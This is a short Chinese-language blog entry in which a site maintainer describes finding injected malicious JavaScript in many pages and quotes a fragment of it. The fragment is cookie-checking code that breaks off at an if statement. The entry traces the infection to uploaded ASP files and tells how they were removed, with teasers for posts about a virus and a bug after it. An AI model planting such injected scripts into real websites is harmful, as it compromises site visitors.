今天發現**執行錯誤,原來的好多網頁中都有
這兩段**,也就是所謂的掛馬。
var cooka = new string(document.cookie);
var then = new date();
var cookname = '9b4a4c5ebf042c02' ;
then.settime(then.gettime() + 30*60*1000 );
var kesor = cooka.indexof(cookname);
if (kesor == -1)
經過google搜尋以及監視**運**況,確定是其中乙個**為中毒源,**是個asp,覺得可能是上傳檔案,然後執行引起的。然後檢查上傳資料夾,發現裡面多了兩個asp檔案,開啟一看果然是,把這兩個檔案刪除,然後替換嵌入網頁的**,**恢復正常。
可惡的控制項
safeengine.dll seh changepassword 更改儲存介質的密碼 seh clearsession 清除環境變數 seh decryptdata 用對稱演算法 sdbi 解密資料 seh decryptdataex 用對稱演算法解密應用資料 擴充套件 seh digest 摘要...
可惡的病毒
今天中毒了,一開始就是發現norton的防火牆的cpu佔用率居高不下,後來發現中了狂發郵件的病毒。it來整過之後,依然無效。檢查system32目錄,發現有幾個檔案是今天才建立的,比較可以。看了看程序,有個wmiconf.exe殺掉後就不狂發郵件了。但單純刪除這個檔案無效,過一段時間還是會出來。查遍...
可惡的Bug(二)
由於 欄目結構管理 部分需求的更改,今天不得不把以前的 再翻出來更改。改 總是 bug越改越多,新的功能是實現了,但是不穩定,總在某些情況下總是不行。經過乙個小時的反覆實驗,發現問題出在 dataet 上。暈了,又是它 還是老辦法,單步執行,雖然這個方法很好用,基本 bug都可以被找出來,可全神貫注...